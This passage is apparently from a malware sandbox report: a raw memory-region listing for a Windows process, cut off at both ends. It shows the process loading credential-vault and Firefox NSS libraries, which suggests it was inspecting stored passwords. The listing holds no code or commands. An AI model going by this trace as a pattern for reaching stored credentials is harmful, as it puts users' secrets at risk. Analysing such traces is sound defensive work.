"\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 989 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 990 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 991 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 992 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 993 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 994 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 995 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 996 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 997 start_va = 0x718a0000 end_va = 0x71ac3fff entry_point = 0x718a0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 998 start_va = 0x71ad0000 end_va = 0x71b61fff entry_point = 0x71ad0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 999 start_va = 0x74800000 end_va = 0x74807fff entry_point = 0x74800000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1000 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1001 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1002 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1003 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1004 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1005 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1006 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1007 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1008 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1009 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1010 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1011 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1012 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1013 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1014 start_va = 0x76f30000 end_va = 0x77019fff entry_point = 0x76f30000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1015 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1016 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1017 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1018 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1019 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1020 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1021 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1022 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1023 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1024 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1025 start_va = 0x8a0000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1026 start_va = 0x8b0000 end_va = 0xa37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1027 start_va = 0xa40000 end_va = 0xbc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1028 start_va = 0xbd0000 end_va = 0x1fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 1029 start_va = 0x2180000 end_va = 0x218ffff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1030 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1031 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1032 start_va = 0x750000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1033 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1034 start_va = 0x2190000 end_va = 0x24c6fff entry_point = 0x2190000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1035 start_va = 0x1fd0000 end_va = 0x20cffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1036 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1037 start_va = 0x2f0000 end_va = 0x305fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1038 start_va = 0x310000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1039 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1040 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1041 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1042 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1043 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1044 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1045 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1046 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1047 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1048 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1049 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1050 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1051 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1052 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1053 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1054 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1055 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1056 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1057 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1058 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1059 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1060 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1061 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1062 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1063 start_va = 0x76ec0000 end_va = 0x76ec5fff entry_point = 0x76ec0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1064 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1065 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1066 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1067 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1068 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1069 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1070 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1071 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1072 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1073 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1074 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1075 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1076 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1077 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1078 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1079 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1080 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1081 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1082 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1083 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1084 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1085 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1086 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1087 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1088 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1089 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1090 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1091 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1092 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1093 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1094 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1095 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1096 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1097 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1098 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1099 start_va = 0x715d0000 end_va = 0x71890fff entry_point = 0x715d0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1100 start_va = 0x76ce0000 end_va = 0x76d71fff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1101 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x2f0000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1102 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1103 start_va = 0x310000 end_va = 0x314fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1104 start_va = 0x310000 end_va = 0x314fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1105 start_va = 0x310000 end_va = 0x314fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1106 start_va = 0x732f0000 end_va = 0x73302fff entry_point = 0x732f0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1107 start_va = 0x732d0000 end_va = 0x732eafff entry_point = 0x732d0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1108 start_va = 0x732a0000 end_va = 0x732cefff entry_point = 0x732a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1109 start_va = 0x73110000 end_va = 0x73117fff entry_point = 0x73110000 region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\SysWOW64\\pstorec.dll" (normalized: "c:\\windows\\syswow64\\pstorec.dll") Region: id = 1110 start_va = 0x71590000 end_va = 0x715c5fff entry_point = 0x71590000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 1111 start_va = 0x714c0000 end_va = 0x71584fff entry_point = 0x714c0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 1112 start_va = 0x24d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1113 start_va = 0x24d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1114 start_va = 0x24d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1115 start_va = 0x24d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1116 start_va = 0x24d0000 end_va = 0x25fafff entry_point = 0x24d0000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll") Region: id = 1117 start_va = 0x71390000 end_va = 0x714befff entry_point = 0x71390000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll") Region: id = 1118 start_va = 0x71330000 end_va = 0x71351fff entry_point = 0x71330000 region_type = mapped_file name = "mozglue.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll") Region: id = 1119 start_va = 0x71360000 end_va = 0x71383fff entry_point = 0x71360000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1120 start_va = 0x73110000 end_va = 0x73117fff entry_point = 0x73110000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 1121 start_va = 0x76ed0000 end_va = 0x76f2bfff entry_point = 0x76ed0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1122 start_va = 0x74ac0000 end_va = 0x74ac6fff entry_point = 0x74ac0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1123 start_va = 0x71250000 end_va = 0x7132bfff entry_point = 0x71250000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 1124 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1125 start_va = 0x560000 end_va = 0x63bfff entry_point = 0x560000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 1126 start_va = 0x24d0000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1127 start_va = 0x71050000 end_va = 0x710bcfff entry_point = 0x71050000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\msvcp140.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcp140.dll") Region: id = 1128 start_va = 0x71200000 end_va = 0x71222fff entry_point = 0x71200000 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 1129 start_va = 0x71230000 end_va = 0x71244fff entry_point = 0x71230000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\vcruntime140.dll") Region: id = 1130 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1131 start_va = 0x77020000 end_va = 0x77055fff entry_point = 0x77020000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1132 start_va = 0x710c0000 end_va = 0x711fefff entry_point = 0x710c0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1133 start_va = 0x350000 end_va = 0x353fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1134 start_va = 0x71020000 end_va = 0x71040fff entry_point = 0x71020000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1135 start_va = 0x25d0000 end_va = 0x26cffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 1136 start_va = 0x25d0000 end_va = 0x27cefff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 1137 start_va = 0x2600000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1138 start_va = 0x2700000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1139 start_va = 0x70ff0000 end_va = 0x71015fff entry_point = 0x70ff0000 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll") Region: id = 1140 start_va = 0x70fd0000 end_va = 0x70fe8fff entry_point = 0x70fd0000 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll") Region: id = 1141 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1142 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1143 start_va = 0x370000 end_va = 0x372fff entry_point = 0x370000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1144 start_va = 0x380000 end_va = 0x388fff entry_point = 0x380000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1145 start_va = 0x370000 end_va = 0x372fff entry_point = 0x370000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1146 start_va = 0x380000 end_va = 0x388fff entry_point = 0x380000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1147 start_va = 0x70f70000 end_va = 0x70fc4fff entry_point = 0x70f70000 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll") Region: id = 1148 start_va = 0x70ff0000 end_va = 0x71015fff entry_point = 